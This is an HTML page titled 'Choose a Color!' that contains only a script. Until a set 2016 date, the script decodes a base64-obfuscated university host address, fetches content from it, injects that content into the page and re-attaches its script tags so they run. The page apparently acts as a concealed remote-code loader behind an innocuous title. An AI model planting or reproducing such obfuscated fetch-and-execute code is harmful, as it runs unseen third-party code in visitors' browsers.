<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<style>
html, body {
    margin: 0;
    height: 100%;
    width: 100%;
}
iframe {
    border: none;
    height: 100%;
    width: 100%;
}
</style>
<title>Choose a Color!</title>
<body>
<script type="text/javascript">
    (function(){
        function httpGet(theUrl, callback) {
            if (window.XMLHttpRequest) {
                xmlhttp = new XMLHttpRequest();
                xmlhttp.addEventListener("load", function() {
                    callback(this.responseText);
                });
                xmlhttp.open("GET", theUrl);
                xmlhttp.send();
            }
        }
        function canShow() {
            //On or before Dec 4, 2016
            var date = new Date()
            var month = date.getMonth()
            if (date.getYear() != 116) {
                return false
            }
            if (month < 11) {
                return true
            }
            if (month == 11 && date.getDate() <= 4) {
                return true
            }
            return false
        }
        if (canShow()) {
            var obf = ["aHR0cDovL3JwaS5zdHVkZW50LnJpdC5lZHU=", "ODA4MA=="]
            var src = ""
            for (var i=0; i<obf.length; i++) {
                src += atob(obf[i])
            }
            src = src.slice(0,src.length-4) + atob("Og==") + src.slice(src.length-4)
            var frame = document.createElement('object')
            frame.innerHTML = "<div style='background: red; color: white; text-align: center; height: 50px; padding-top: 8px; font-size: 30px;'>This should not be visible</div>"
            document.body.appendChild(frame)
            httpGet(src, function(data) {
                //console.log(data)
                frame.innerHTML = data
                var scripts = frame.querySelectorAll("script, link")
                var scr = null
                for (var i=0; i<scripts.length; i++) {
                    scr = scripts[i]
                    scr.parentElement.removeChild(scr)
                    document.body.appendChild(scr)
                    console.log("Moving ",scr)
                    if (scr.src) {
                        if (scr.src[0] == "/") {
                            scr.setAttribute("src", src + scr.getAttribute("src"))
                        }
                    } else if (scr.href) {
                        if (scr.href[0] == "/") {
                            scr.setAttribute("href", src + scr.getAttribute("href"))
                        }
                    }
                }
            })
        }
    })()
</script>
</body>
</html>
